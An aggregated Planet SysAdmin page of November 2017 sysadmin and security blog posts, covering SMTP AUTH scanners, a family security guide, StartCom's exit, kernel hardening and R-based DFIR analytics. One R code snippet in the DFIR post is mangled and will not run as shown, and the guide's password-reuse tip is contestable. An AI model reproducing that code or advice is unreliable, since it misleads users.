Planet SysAdmin


November 22, 2017

Chris Siebenmann

Delays on SMTP replies discourage apparently SMTP AUTH scanners

One of the things that my sinkhole SMTP server can do is trickle out all of its SMTP replies at a rate of one character every tenth of a second. This is a feature that I blatantly stole from OpenBSD's spamd when I read about it years ago, mostly because it seemed like a good idea. The effects of doing this have been interesting, because there's a real split in the results.

At the moment I have my sinkhole server listening on two IP addresses. One IP address is the MX target for some long-standing host names that collect a bunch of spam. The other IP address used to be the MX target for one such host, but that ended several months ago; it's run a SMTP server for years, though. As far as I've seen, all spam email attempts come to the first IP address and those senders are generally completely indifferent to the slow output they're getting. I'm not really surprised by this; real mail software is going to be willing to cope with relatively slow responses because there are all sorts of reasons they can happen, including overloaded destination systems. Even if you're writing your own software, you have to go out of your way to have timeouts so fast that they'd trigger on my responses.

(There was a day when some spam software working through compromised end machines and open proxies would respond to slow 'tarpit' responses by disconnecting, but I'm not convinced anything does that any more. However I haven't attempted to do any real study of this, partly because it's hard to sort out noise from signal in my current setup.)

Things are very different on the second IP, the one that isn't an MX target of anything currently but which used to run a SMTP server. There, there is a huge number of IP addresses that connect and then disconnect before my greeting banner even finishes trickling out. When I've turned my slow replies tarpit off to see what these connections looked like, they've all turned out to behave like SMTP AUTH scanners. Some of them will EHLO (often with with suggestive names) and then disconnect when they don't see AUTH advertised in my EHLO greeting; others will go through the EHLO and then start blindly spitting AUTH LOGIN requests at me. Not infrequently they'll do this repeatedly, or with a lot of concurrent connections, or both.

(To my surprise I don't think any of them ever tried STARTTLS, which I do advertise and which SMTP authentication is often gated behind.)

We have a very simple connection time delay in our external mail gateway and now that I check, we are seeing a certain amount of Exim messages about 'unexpected disconnection while reading SMTP command from ...'. However, I'm not sure how far these connections have gotten before then. They do generally seem to have hostnames typical of end-user IPs, just like the connections I see to my second IP, so it's possible that these are attempts at SMTP AUTH probing.

(We probably don't care enough to bother adding logging that would tell us. It's not exactly actionable information; everyone with exposed IPs and services on the Internet is getting probed all the time.)

by cks at November 22, 2017 06:24 AM

November 21, 2017

Errata Security

Your Holiday Cybersecurity Guide

Many of us are visiting parents/relatives this Thanksgiving/Christmas, and will have an opportunity to help our them with cybersecurity issues. I thought I'd write up a quick guide of the most important things.

1. Stop them from reusing passwords

By far the biggest threat to average people is that they re-use the same password across many websites, so that when one website gets hacked, all their accounts get hacked.

To demonstrate the problem, go to haveibeenpwned.com and enter the email address of your relatives. This will show them a number of sites where their password has already been stolen, like LinkedIn, Adobe, etc. That should convince them of the severity of the problem.

They don't need a separate password for every site. You don't care about the majority of website whether you get hacked. Use a common password for all the meaningless sites. You only need unique passwords for important accounts, like email, Facebook, and Twitter.

Write down passwords and store them in a safe place. Sure, it's a common joke that people in offices write passwords on Post-It notes stuck on their monitors or under their keyboards. This is a common security mistake, but that's only because the office environment is widely accessible. Your home isn't, and there's plenty of places to store written passwords securely, such as in a home safe. Even if it's just a desk drawer, such passwords are safe from hackers, because they aren't on a computer.

Write them down, with pen and paper. Don't put them in a MyPasswords.doc, because when a hacker breaks in, they'll easily find that document and easily hack your accounts.

You might help them out with getting a password manager, or two-factor authentication (2FA). Good 2FA like YubiKey will stop a lot of phishing threats. But this is difficult technology to learn, and of course, you'll be on the hook for support issues, such as when they lose the device. Thus, while 2FA is best, I'm only recommending pen-and-paper to store passwords. (AccessNow has a guide, though I think YubiKey/U2F keys for Facebook and GMail are the best).


2. Lock their phone (passcode, fingerprint, faceprint)

You'll lose your phone at some point. It has the keys all all your accounts, like email and so on. With your email, phones thieves can then reset passwords on all your other accounts. Thus, it's incredibly important to lock the phone.

Apple has made this especially easy with fingerprints (and now faceprints), so there's little excuse not to lock the phone.

Note that Apple iPhones are the most secure. I give my mother my old iPhones so that they will have something secure.

My mom demonstrates a problem you'll have with the older generation: she doesn't reliably have her phone with her, and charged. She's the opposite of my dad who religiously slaved to his phone. Even a small change to make her lock her phone means it'll be even more likely she won't have it with her when you need to call her.


3. WiFi (WPA)

Make sure their home WiFi is WPA encrypted. It probably already is, but it's worthwhile checking.

The password should be written down on the same piece of paper as all the other passwords. This is importance. My parents just moved, Comcast installed a WiFi access point for them, and they promptly lost the piece of paper. When I wanted to debug some thing on their network today, they didn't know the password, and couldn't find the paper. Get that password written down in a place it won't get lost!

Discourage them from extra security features like "SSID hiding" and/or "MAC address filtering". They provide no security benefit, and actually make security worse. It means a phone has to advertise the SSID when away from home, and it makes MAC address randomization harder, both of which allows your privacy to be tracked.

If they have a really old home router, you should probably replace it, or at least update the firmware. A lot of old routers have hacks that allow hackers (like me masscaning the Internet) to easily break in.


4. Ad blockers or Brave

Most of the online tricks that will confuse your older parents will come via advertising, such as popups claiming "You are infected with a virus, click here to clean it". Installing an ad blocker in the browser, such as uBlock Origin, stops most all this nonsense.

For example, here's a screenshot of going to the "Speedtest" website to test the speed of my connection (I took this on the plane on the way home for Thanksgiving). Ignore the error (plane's firewall Speedtest) -- but instead look at the advertising banner across the top of the page insisting you need to download a browser extension. This is tricking you into installing malware -- the ad appears as if it's a message from Speedtest, it's not. Speedtest is just selling advertising and has no clue what the banner says. This sort of thing needs to be blocked -- it fools even the technologically competent.

uBlock Origin for Chrome is the one I use. Another option is to replace their browser with Brave, a browser that blocks ads, but at the same time, allows micropayments to support websites you want to support. I use Brave on my iPhone.

A side benefit of ad blockers or Brave is that web surfing becomes much faster, since you aren't downloading all this advertising. The smallest NYtimes story is 15 megabytes in size due to all the advertisements, for example.


5. Cloud Backups

Do backups, in the cloud. It's a good idea in general, especially with the threat of ransomware these days.

In particular, consider your photos. Over time, they will be lost, because people make no effort to keep track of them. All hard drives will eventually crash, deleting your photos. Sure, a few key ones are backed up on Facebook for life, but the rest aren't.

There are so many excellent online backup services out there, like DropBox and Backblaze. Or, you can use the iCloud feature that Apple provides. My favorite is Microsoft's: I already pay $99 a year for Office 365 subscription, and it comes with 1-terabyte of online storage.


6. Separate email accounts

You should have three email accounts: work, personal, and financial.

First, you really need to separate your work account from personal. The IT department is already getting misdirected emails with your spouse/lover that they don't want to see. Any conflict with your work, such as getting fired, gives your private correspondence to their lawyers.

Second, you need a wholly separate account for financial stuff, like Amazon.com, your bank, PayPal, and so on. That prevents confusion with phishing attacks.

Consider this warning today:
If you had split accounts, you could safely ignore this. The USPS would only your financial email account, which gets no phishing attacks, because it's not widely known. When your receive the phishing attack on your personal email, you ignore it, because you know the USPS doesn't know your personal email account.

Phishing emails are so sophisticated that even experts can't tell the difference. Splitting financial from personal emails makes it so you don't have to tell the difference -- anything financial sent to personal email can safely be ignored.

7. Deauth those apps!

Twitter user @tompcoleman comments that we also need deauth apps.

Social media sites like Facebook, Twitter, and Google encourage you to enable "apps" that work their platforms, often demanding privileges to generate messages on your behalf. The typical scenario is that you use them only once or twice and forget about them.

A lot of them are hostile. For example, my niece's twitter account would occasional send out advertisements, and she didn't know why. It's because a long time ago, she enabled an app with the permission to send tweets for her. I had to sit down and get rid of most of her apps.

Now would be a good time to go through your relatives Facebook, Twitter, and Google/GMail and disable those apps. Don't be a afraid to be ruthless -- they probably weren't using them anyway. Some will still be necessary. For example, Twitter for iPhone shows up in the list of Twitter apps. The URL for editing these apps for Twitter is https://twitter.com/settings/applications. Google link is here (thanks @spextr). I don't know of simple URLs for Facebook, but you should find it somewhere under privacy/security settings.



8. Up-to-date software? maybe

I put this last because it can be so much work.

You should install the latest OS (Windows 10, macOS High Sierra), and also turn on automatic patching.

But remember it may not be worth the huge effort involved. I want my parents to be secure -- but no so secure I have to deal with issues.

For example, when my parents updated their HP Print software, the icon on the desktop my mom usually uses to scan things in from the printer disappeared, and needed me to spend 15 minutes with her helping find the new way to access the software.

However, I did get my mom a new netbook to travel with instead of the old WinXP one. I want to get her a Chromebook, but she doesn't want one.

For iOS, you can probably make sure their phones have the latest version without having these usability problems.

Conclusion

You can't solve every problem for your relatives, but these are the more critical ones.

by Robert Graham (noreply@blogger.com) at November 21, 2017 09:38 PM

Chris Siebenmann

Major version changes are often partly a signal about support

Recently (for some value of recently) I read The cargo cult of versioning (via). To simplify, one of the things that it advocates is shifting the major version number to being part of the package name:

Next, move the major version to part of the name of a package. "Rails 5.1.4" becomes "Rails-5 (1, 4)". By following Rich Hickey's suggestion above, we also sidestep the question of what the default version should be. There's just no way to refer to a package without its major version.

I am biased to see versioning as ultimately a social thing. Looking at major version number changes through that lens, I feel that one of their social uses is being overlooked by this suggested change.

Many projects take what is effectively the default approach of having a single unified home page, a single repository, and so on, not separate home pages, repositories, and so on for each major version. In these setups, incrementing the major version number of your project and advertising the shift is a strong social signal that past major versions are no longer being supported unless you say otherwise. If you move from mypackage version 1.2.3 to mypackage version 2.0.0, you're signalling not just an API change but also that by default there will not be a mypackage 1.2.4. In fact you're further signalling that people should not build (new) projects using mypackage version 1.2.3; if they do so anyway, they're going to extra work to fish an old tag out of your repository or an old tarball out of your 'archived past versions' download area.

As I see it, this works because people think of there being a single project 'mypackage', not two separate projects 'mypackage version 1' and 'mypackage version 2'. Since there is only one project, it's relatively clear that by default it only has one actively developed major version, the latest, since I don't think people expect most projects to be working in several directions at once.

(Where projects have diverged from this model the result has often been confusion and annoyance. The case I'm closest to is Python, where having both 'Python 2' and 'Python 3' has caused all sorts of problems. But I'm not sure that calling them 'Python-2' and 'Python-3' would have helped. Incompatible major version changes in major projects appear to be a problem, period.)

I initially thought that you'd have problems getting this clear signal in a world where things were 'mypackage-1' and 'mypackage-2' instead of 'mypackage version ...'. Now, though, I'm not so sure. You'd probably have to be more explicit on your project web pages, which might not be such a bad thing, but it might be clear enough to people in general.

by cks at November 21, 2017 04:36 AM

November 20, 2017

Errata Security

Why Linus is right (as usual)

People are debating this email from Linus Torvalds (maintainer of the Linux kernel). It has strong language, like:
Some security people have scoffed at me when I say that security
problems are primarily "just bugs".
Those security people are f*cking morons.
Because honestly, the kind of security person who doesn't accept that
security problems are primarily just bugs, I don't want to work with.
I thought I'd explain why Linus is right.

Linus has an unwritten manifesto of how the Linux kernel should be maintained. It's not written down in one place, instead we are supposed to reverse engineer it from his scathing emails, where he calls people morons for not understanding it. This is one such scathing email. The rules he's expressing here are:
  • Large changes to the kernel should happen in small iterative steps, each one thoroughly debugged.
  • Minor security concerns aren't major emergencies; they don't allow bypassing the rules more than any other bug/feature.
Last year, some security "hardening" code was added to the kernel to prevent a class of buffer-overflow/out-of-bounds issues. This code didn't address any particular 0day vulnerability, but was designed to prevent a class of future potential exploits from being exploited. This is reasonable.

This code had bugs, but that's no sin. All code has bugs.

The sin, from Linus's point of view, is that when an overflow/out-of-bounds access was detected, the code would kill the user-mode process or kernel. Linus thinks it should have only generated warnings, and let the offending code continue to run.

Of course, that would in theory make the change of little benefit, because it would no longer prevent 0days from being exploited.

But warnings would only be temporary, the first step. There's likely to be be bugs in the large code change, and it would probably uncover bugs in other code. While bounds-checking is a security issue, it's first implementation will always find existing code having bounds bugs. Or, it'll have "false-positives" triggering on things that aren't actually the flaws its looking for. Killing things made these bugs worse, causing catastrophic failures in the latest kernel that didn't exist before. Warnings, however, would have equally highlighted the bugs, but without causing catastrophic failures. My car runs multiple copies of Linux -- such catastrophic failures would risk my life.

Only after a year, when the bugs have been fixed, would the default behavior of the code be changed to kill buggy code, thus preventing exploitation.

In other words, large changes to the kernel should happen in small, manageable steps. This hardening hasn't existed for 25 years of the Linux kernel, so there's no emergency requiring it be added immediately rather than conservatively, no reason to bypass Linus's development processes. There's no reason it couldn't have been warnings for a year while working out problems, followed by killing buggy code later.

Linus was correct here. No vuln has appeared in the last year that this code would've stopped, so the fact that it killed processes/kernels rather than generated warnings was unnecessary. Conversely, because it killed things, bugs in the kernel code were costly, and required emergency patches.

Despite his unreasonable tone, Linus is a hugely reasonable person. He's not trying to stop changes to the kernel. He's not trying to stop security improvements. He's not even trying to stop processes from getting killed That's not why people are moronic. Instead, they are moronic for not understanding that large changes need to made conservatively, and security issues are no more important than any other feature/bug.




Update: Also, since most security people aren't developers, they are also a bit clueless how things actually work. Bounds-checking, which they define as purely a security feature to stop buffer-overflows is actually overwhelmingly a debugging feature. Developers know this, security "experts" tend not to. These kernel changes were made by security people who failed to understand this, who failed to realize that their changes would uncover lots of bugs in existing code, and that killing buggy code was hugely inappropriate.

Update: Another flaw developers are intimately familiar with is how "hardening" code can cause false-positives, triggering on non-buggy code. A good example is where the BIND9 code crashed on an improper assert(). This hardening code designed to prevent exploitation made things worse by triggering on valid input/code.

Update: No, it's probably not okay to call people "morons" as Linus does. They may be wrong, but they usually are reasonable people. On the other hand, security people tend to be sanctimonious bastards with rigid thinking, so after he as dealt with that minority, I can see why Linus treats all security people that way.

by Robert Graham (noreply@blogger.com) at November 20, 2017 09:19 PM

Chris Siebenmann

StartCom gives up on its Certificate Authority business

The big news recently in the web browser SSL world is that StartCom has officially given up on being a CA because, as I put it on Twitter, no one trusts them any more. As far as I know, this makes StartCom the first CA to go out of business merely because of dubious practices and shady business practices (ie, quietly selling themselves to WoSign), instead of total security failures (DigiNotar) or utter incompetence (ipsCA). I consider this a great thing for the overall health and security of the browser CA ecology, because it shows that browsers are now not afraid to use their teeth.

StartCom is far from unique in having dubious practices (although they may have had the most occurrences). All sorts of CAs have them (or have had them), and in the past those CAs have generally skated by with only minor objections from the browsers; no one seemed ready to actually drop a CA over these practices, perhaps partly because of the collective action problem here. As a result, CAs had very little incentive to not be a bit sloppy and dubious. Are your customers prepared to spend enough money on SHA1 certificates even though you shouldn't issue them any more? Well, perhaps you can find a way around that. And so on.

The good news is that those days are over now, and StartCom going out of business (apparently along with WoSign) shows the consequences of ignoring that. At least Mozilla and Chrome are demonstrably willing to remove CAs for mere sloppy behavior and dubious practices, even if they're still moving slowly on it (IE and Safari are more opaque here). Tighter CA standards benefit web security in the obvious way, and reducing the number of CAs and trusted CA certificates out there is one way to deal with the core security problem of TLS on the web. Unsurprisingly, I'm in favour of this. In practice we put a huge amount of trust in CAs, so I think that CAs need to be held to a high standard and punished when they fail or are sloppy.

(The next CA on the chopping block is Symantec, perhaps even after DigiCert buys their assets; Mozilla is somewhat dubious.)

Sidebar: My personal view of StartCom

In the past, I got free certificates through StartCom (in the form of StartSSL). Part of StartSSL's business model was giving away basic certificates for free and then charging for revocation, which looked reasonably fair until Heartbleed happened. After Heartbleed, the nice thing for StartCom to do would have been to waive the fee to revoke and re-issue current certificates; this would have neatly dealt with the dilemma of practical reactions to the possible private key compromise. You can probably guess what happened next; StartCom declined to do so. Even in the light of Heartbleed, they stuck to their 'pay us money' policy. As a result, I'm confident that lots of people did not revoke certificates and probably a decent number did not even roll them over (since that would have required paying another CA for new certificates).

From that point on, I disliked StartCom/StartSSL. When Let's Encrypt provided an alternate source of free TLS certificates, I was quite happy to leave them behind. Looking back now, it's clear to me that StartCom didn't actually care very much about TLS and web security; they cared mostly or entirely about making money, and if their policies caused real TLS security issues (such as people staying with potentially exposed certificate keys), well, tough luck. They could get away with it, so they did it.

by cks at November 20, 2017 04:02 AM

HolisticInfoSec.org

toolsmith #129 - DFIR Redefined: Deeper Functionality for Investigators with R - Part 2

You can have data without information, but you cannot have information without data. ~Daniel Keys Moran

Here we resume our discussion of DFIR Redefined: Deeper Functionality for Investigators with R as begun in Part 1.
First, now that my presentation season has wrapped up, I've posted the related material on the Github for this content. I've specifically posted the most recent version as presented at SecureWorld Seattle, which included Eric Kapfhammer's contributions and a bit of his forward thinking for next steps in this approach.
When we left off last month I parted company with you in the middle of an explanation of analysis of emotional valence, or the "the intrinsic attractiveness (positive valence) or averseness (negative valence) of an event, object, or situation", using R and the Twitter API. It's probably worth your time to go back and refresh with the end of Part 1. Our last discussion point was specific to the popularity of negative tweets versus positive tweets with a cluster of emotionally neutral retweets, two positive retweets, and a load of negative retweets. This type of analysis can quickly give us better understanding of an attacker collective's sentiment, particularly where the collective is vocal via social media. Teeing off the popularity of negative versus positive sentiment, we can assess the actual words fueling such sentiment analysis. It doesn't take us much R code to achieve our goal using the apply family of functions. The likes of apply, lapply, and sapply allow you to manipulate slices of data from matrices, arrays, lists and data frames in a repetitive way without having to use loops. We use code here directly from Michael Levy, Social Scientist, and his Playing with Twitter Data post.

polWordTables = 
  sapply(pol, function(p) {
    words = c(positiveWords = paste(p[[1]]$pos.words[[1]], collapse = ' '), 
              negativeWords = paste(p[[1]]$neg.words[[1]], collapse = ' '))
    gsub('-', '', words)  # Get rid of nothing found's "-"
  }) %>%
  apply(1, paste, collapse = ' ') %>% 
  stripWhitespace() %>% 
  strsplit(' ') %>%
  sapply(table)

par(mfrow = c(1, 2))
invisible(
  lapply(1:2, function(i) {
    dotchart(sort(polWordTables[[i]]), cex = .5)
    mtext(names(polWordTables)[i])
  }))

The result is a tidy visual representation of exactly what we learned at the end of Part 1, results as noted in Figure 1.

Figure 1: Positive vs negative words
Content including words such as killed, dangerous, infected, and attacks are definitely more interesting to readers than words such as good and clean. Sentiment like this could definitely be used to assess potential attacker outcomes and behaviors just prior, or in the midst of an attack, particularly in DDoS scenarios. Couple sentiment analysis with the ability to visualize networks of retweets and mentions, and you could zoom in on potential leaders or organizers. The larger the network node, the more retweets, as seen in Figure 2.

Figure 2: Who is retweeting who?
Remember our initial premise, as described in Part 1, was that attacker groups often use associated hashtags and handles, and the minions that want to be "part of" often retweet and use the hashtag(s). Individual attackers either freely give themselves away, or often become easily identifiable or associated, via Twitter. Note that our dominant retweets are for @joe4security, @HackRead,  @defendmalware (not actual attackers, but bloggers talking about attacks, used here for example's sake). Figure 3 shows us who is mentioning who.

Figure 3: Who is mentioning who?
Note that @defendmalware mentions @HackRead. If these were actual attackers it would not be unreasonable to imagine a possible relationship between Twitter accounts that are actively retweeting and mentioning each other before or during an attack. Now let's assume @HackRead might be a possible suspect and you'd like to learn a bit more about possible additional suspects. In reality @HackRead HQ is in Milan, Italy. Perhaps Milan then might be a location for other attackers. I can feed  in Twittter handles from my retweet and mentions network above, query the Twitter API with very specific geocode, and lock it within five miles of the center of Milan.
The results are immediate per Figure 4.

Figure 4: GeoLocation code and results
Obviously, as these Twitter accounts aren't actual attackers, their retweets aren't actually pertinent to our presumed attack scenario, but they definitely retweeted @computerweekly (seen in retweets and mentions) from within five miles of the center of Milan. If @HackRead were the leader of an organization, and we believed that associates were assumed to be within geographical proximity, geolocation via the Twitter API could be quite useful. Again, these are all used as thematic examples, no actual attacks should be related to any of these accounts in any way.

With the abundance of data, and often subjective or biased analysis, there are occasions where a quick, authoritative decision can be quite beneficial. Fast-and-frugal trees (FFTs) to the rescue. FFTs are simple algorithms that facilitate efficient and accurate decisions based on limited information.
Nathaniel D. Phillips, PhD created FFTrees for R to allow anyone to easily create, visualize and evaluate FFTs. Malcolm Gladwell has said that "we are suspicious of rapid cognition. We live in a world that assumes that the quality of a decision is directly related to the time and effort that went into making it.” FFTs, and decision trees at large, counter that premise and aid in the timely, efficient processing of data with the intent of a quick but sound decision. As with so much of information security, there is often a direct correlation with medical, psychological, and social sciences, and the use of FFTs is no different. Often, predictive analysis is conducted with logistic regression, used to "describe data and to explain the relationship between one dependent binary variable and one or more nominal, ordinal, interval or ratio-level independent variables." Would you prefer logistic regression or FFTs?

Figure 5: Thanks, I'll take FFTs
Here's a text book information security scenario, often rife with subjectivity and bias. After a breach, and subsequent third party risk assessment that generated a ton of CVSS data, make a fast decision about what treatments to apply first. Because everyone loves CVSS.

Figure 6: CVSS meh
Nothing like a massive table, scored by base, impact, exploitability, temporal, environmental, modified impact, and overall scores, all assessed by a third party assessor who may not fully understand the complexities or nuances of your environment. Let's say our esteemed assessor has decided that there are 683 total findings, of which 444 are non-critical and 239 are critical. Will FFTrees agree? Nay! First, a wee bit of R code.

library("FFTrees")
cvss <- c:="" coding="" csv="" p="" r="" read.csv="" rees="">cvss.fft <- data="cvss)</p" fftrees="" formula="critical">plot(cvss.fft, what = "cues")
plot(cvss.fft,
     main = "CVSS FFT",
     decision.names = c("Non-Critical", "Critical"))


Guess what, the model landed right on impact and exploitability as the most important inputs, and not just because it's logically so, but because of their position when assessed for where they fall in the area under the curve (AUC), where the specific curve is the receiver operating characteristic (ROC). The ROC is a "graphical plot that illustrates the diagnostic ability of a binary classifier system as its discrimination threshold is varied." As for the AUC, accuracy is measured by the area under the ROC curve where an area of 1 represents a perfect test and an area of .5 represents a worthless test. Simply, the closer to 1, the better. For this model and data, impact and exploitability are the most accurate as seen in Figure 7.

Figure 7: Cue rankings prefer impact and exploitability
The fast and frugal tree made its decision where impact and exploitability with scores equal or less than 2 were non-critical and exploitability greater than 2 was labeled critical, as seen in Figure 8.

Figure 8: The FFT decides
Ah hah! Our FFT sees things differently than our assessor. With a 93% average for performance fitting (this is good), our tree, making decisions on impact and exploitability, decides that there are 444 non-critical findings and 222 critical findings, a 17 point differential from our assessor. Can we all agree that mitigating and remediating critical findings can be an expensive proposition? If you, with just a modicum of data science, can make an authoritative decision that saves you time and money without adversely impacting your security posture, would you count it as a win? Yes, that was rhetorical.

Note that the FFTrees function automatically builds several versions of the same general tree that make different error trade-offs with variations in performance fitting and false positives. This gives you the option to test variables and make potentially even more informed decisions within the construct of one model. Ultimately, fast frugal trees make very fast decisions on 1 to 5 pieces of information and ignore all other information. In other words, "FFTrees are noncompensatory, once they make a decision based on a few pieces of information, no additional information changes the decision."

Finally, let's take a look at monitoring user logon anomalies in high volume environments with Time Series Regression (TSR). Much of this work comes courtesy of Eric Kapfhammer, our lead data scientist on our Microsoft Windows and Devices Group Blue Team. The ideal Windows Event ID for such activity is clearly 4624: an account was successfully logged on. This event is typically one of the top 5 events in terms of volume in most environments, and has multiple type codes including Network, Service, and RemoteInteractive.
User accounts will begin to show patterns over time, in aggregate, including:
  • Seasonality: day of week, patch cycles, 
  • Trend: volume of logons increasing/decreasing over time
  • Noise: randomness
You could look at 4624 with a Z-score model, which sets a threshold based on the number of standard deviations away from an average count over a given period of time, but this is a fairly simple model. The higher the value, the greater the degree of “anomalousness”.
Preferably, via Time Series Regression (TSR), your feature set is more rich:
  • Statistical method for predicting a future response based on the response history (known as autoregressive dynamics) and the transfer of dynamics from relevant predictors
  • Understand and predict the behavior of dynamic systems from experimental or observational data
  • Commonly used for modeling and forecasting of economic, financial and biological systems
How to spot the anomaly in a sea of logon data?
Let's imagine our user, DARPA-549521, in the SUPERSECURE domain, with 90 days of aggregate 4624 Type 10 events by day.

Figure 9: User logon data
With 210 line of R, including comments, log read, file output, and graphing we can visualize and alert on DARPA-549521's data as seen in Figure 10

Figure 10: User behavior outside the confidence interval
We can detect when a user’s account exhibits  changes in their seasonality as it relates to a confidence interval established (learned) over time. In this case, on 27 AUG 2017, the user topped her threshold of 19 logons thus triggering an exception. Now imagine using this model to spot anomalous user behavior across all users and you get a good feel for the model's power.
Eric points out that there are, of course, additional options for modeling including:
  • Seasonal and Trend Decomposition using Loess (STL)
    • Handles any type of seasonality ~ can change over time
    • Smoothness of the trend-cycle can also be controlled by the user
    • Robust to outliers
  • Classification and Regression Trees (CART)
    • Supervised learning approach: teach trees to classify anomaly / non-anomaly
    • Unsupervised learning approach: focus on top-day hold-out and error check
  • Neural Networks
    • LSTM / Multiple time series in combination
These are powerful next steps in your capabilities, I want you to be brave, be creative, go forth and add elements of data science and visualization to your practice. R and Python are well supported and broadly used for this mission and can definitely help you detect attackers faster, contain incidents more rapidly, and enhance your in-house detection and remediation mechanisms.
All the code as I can share is here; sorry, I can only share the TSR example without the source.
All the best in your endeavors!
Cheers...until next time.

by Russ McRee (noreply@blogger.com) at November 20, 2017 12:27 AM

November 17, 2017

Errata Security

How to read newspapers

News articles don't contain the information you think. Instead, they are written according to a formula, and that formula is as much about distorting/hiding information as it is about revealing it.

A good example is the following. I claimed hate-crimes aren't increasing. The tweet below tries to disprove me, by citing a news article that claims the opposite:




But the data behind this article tells a very different story than the words.

Every November, the FBI releases its hate-crime statistics for the previous year. They've been doing this every year for a long time. When they do so, various news organizations grab the data and write a quick story around it.

By "story" I mean a story. Raw numbers don't interest people, so the writer instead has to wrap it in a narrative that does interest people. That's what the writer has done in the above story, leading with the fact that hate crimes have increased.

But is this increase meaningful? What do the numbers actually say?

To answer this, I went to the FBI's website, the source of this data, and grabbed the numbers for the last 20 years, and graphed them in Excel, producing the following graph:


As you can see, there is no significant rise in hate-crimes. Indeed, the latest numbers are about 20% below the average for the last two decades, despite a tiny increase in the last couple years. Statistically/scientifically, there is no change, but you'll never read that in a news article, because it's boring and readers won't pay attention. You'll only get a "news story" that weaves a narrative that interests the reader.

So back to the original tweet exchange. The person used the news story to disprove my claim, but going to the underlying data, it only supports my claim that the hate-crimes are going down, not up -- the small increases of the past couple years are insignificant to the larger decreases of the last two decades.

So that's the point of this post: news stories are deceptive. You have to double-check the data they are based upon, and pay less attention to the narrative they weave, and even less attention to the title designed to grab your attention.


Anyway, as a side-note, I'd like to apologize for being human. The snark/sarcasm of the tweet above gives me extra pleasure in proving them wrong :).

by Robert Graham (noreply@blogger.com) at November 17, 2017 10:55 PM

Colin Percival

FreeBSD/EC2 on C5 instances

Last week, Amazon released the "C5" family of EC2 instances, continuing their trend of improving performance by both providing better hardware and reducing the overhead associated with virtualization. Due to the significant changes in this new instance family, Amazon gave me advance notice of their impending arrival several months ago, and starting in August I had access to (early versions of) these instances so that I could test FreeBSD on them. Unfortunately the final launch date took me slightly by surprise — I was expecting it to be later in the month — so there are still a few kinks which need to be worked out for FreeBSD to run smoothly on C5 instances. I strongly recommend that you read the rest of this blog post before you use FreeBSD on EC2 C5 instances. (Or possibly skip to the end if you're not interested in learning about any of the underlying details.)

November 17, 2017 01:45 AM

November 15, 2017

Everything Sysadmin

Productivity When You Just Can't Even

Ryn Daniels has written an excellent piece about time management and productivity when you are burned out. The advice is spot on. I also do these things when I'm not feeling my best too.

"It's one thing to talk about productivity when you're already feeling motivated and productive, but how do you get things done when it's hard to even make it through the day?"

https://superyesmore.com/productivity-when-you-just-cant-even-0c73d6a1f086209af420c2ced442a2e8

by Tom Limoncelli at November 15, 2017 05:00 PM

November 14, 2017

LZone - Sysadmin

USB seq nnnn is taking a long time

When your dmesg/journalctl/syslog says something like
Nov 14 21:43:12 Wolf systemd-udevd[274]: seq 3634 '/devices/pci0000:00/0000:00:14.0/usb2/2-1' is taking a long time
then know that the only proper manly response can be
systemctl restart udev
Don't allow for disrespectful USB messages!!!

November 14, 2017 08:49 PM

November 13, 2017

Steve Kemp's Blog

Paternity-leave is half-over

I'm taking the month of November off work, so that I can exclusively take care of our child. Despite it being a difficult time, with him teething, it has been a great half-month so far.

During the course of the month I've found my interest in a lot of technological things waning, so I've killed my account(s) on a few platforms, and scaled back others - if I could exclusively do child-care for the next 20 years I'd be very happy, but sadly I don't think that is terribly realistic.

My interest in things hasn't entirely vanished though, to the extent that I found the time to replace my use of etcd with consul yesterday, and I'm trying to work out how to simplify my hosting setup. Right now I have a bunch of servers doing two kinds of web-hosting:

Hosting static-sites is trivial, whether with a virtual machine, via Amazons' S3-service, or some other static-host such as netlify.

Hosting for "dynamic stuff" is harder. These days a trend for "serverless" deployments allows you to react to events and be dynamic, but not everything can be a short-lived piece of ruby/javascript/lambda. It feels like I could setup a generic platform for launching containers, or otherwise modernising FastCGI, etc, but I'm not sure what the point would be. (I'd still be the person maintaining it, and it'd still be a hassle. I've zero interest in selling things to people, as that only means more support.)

In short I have a bunch of servers, they mostly tick over unattended, but I'm not really sure I want to keep them running for the next 10+ years. Over time our child will deserve, demand, and require more attention which means time for personal stuff is only going to diminish.

Simplify things now wouldn't be a bad thing to do, before it is too late.

November 13, 2017 10:00 PM

LZone - Sysadmin

Openshift Ultra-fast Bootstrap

Today I want to share some hints on ultra-fast bootstrapping developers to use Openshift. Given that adoption in your organisation depends on developers daring and wanting to use Kubernetes/Openshift I believe showing a clear and easy migration path is the way to go.

Teach the Basics by Failing!

Actually why not treating Openshift as a user-friendly self-service? Naively approach it and try stuff.

So hold a workshop. Ask people to:
  1. Not use the CLI for now!!! Don't even think about it. Automation comes later!
  2. Login and create a project. That usually works well.
  3. Decide on Docker Image / Source to Image. In the second dialog of the project creation you get presented with those three tabs

    Let them choose their poison.

    Let the image pull fail because they don't find docker images and don't know that they cannot just fetch stuff from docker.com. Explain why this is the case. Show them where to find your preferred base and runtime images in you internal registry which of course is already configured, ready to be used. Show them the base image you suggest.

    Let the template creation fail using an already prepared template. Show were to look up the build error and explain where to find the infamously hidden secrets option everyone needs.

  4. Once the first build fails: explain the logic of applications in Openshift and that they did not only create a project, but also an application. Show the difference of locating builds and deployments. Show how to access logs of both and how to find 'Edit' hidden in the 'Actions' menu.
  5. When the build fails du to SSH connection refused: Explain that (even when using a source secret you already prepared) you need to put the public key in your favourite SCM either globally, per project or per repo for the code pull to work.
  6. When people check the pod first and see it isn't running: Explain again and again the holy trinity of checking stuff:
    1. First check the build
    2. Then check the deployment
    3. Only then check if pods do come up
  7. Finally the pod is green! People will access the deployed application and ask you how? Now is the time to have a short excurse on service and routing. Maybe show an already configured defautl. If some service isn't accessible:
    1. Show how to get the pods TCP endpoint
    2. Show how to attach to a container via the GUI / CLI

Have Docs and Examples Ready

Most important of course is preparation. Do prepare
  1. Walkthrough screenshots
  2. At least one runtime template
  3. At least one base image on your own registry
  4. At least one S2I ready source repository with a hello-world app
  5. Global project settings with
    • a default SSH key for source pulling
    • access configured for your own docker registry
  6. Maybe make an example project visible for all newbies

Things to avoid...

This is of course quite opinionated, but think about it:
  • Talk everyone out of setting up Minishift. You just do not want to support this.
  • Talk everyone out of getting Compose, Swarm, ... to live along side Openshift. You just do not want to support this. And save everyone the time to spend on having both in their development toolchain.

Finally...

Be prepared to iterate this again and again as often as needed.

November 13, 2017 06:01 PM

November 12, 2017

LZone - Sysadmin

Docker disable ext4 journaling

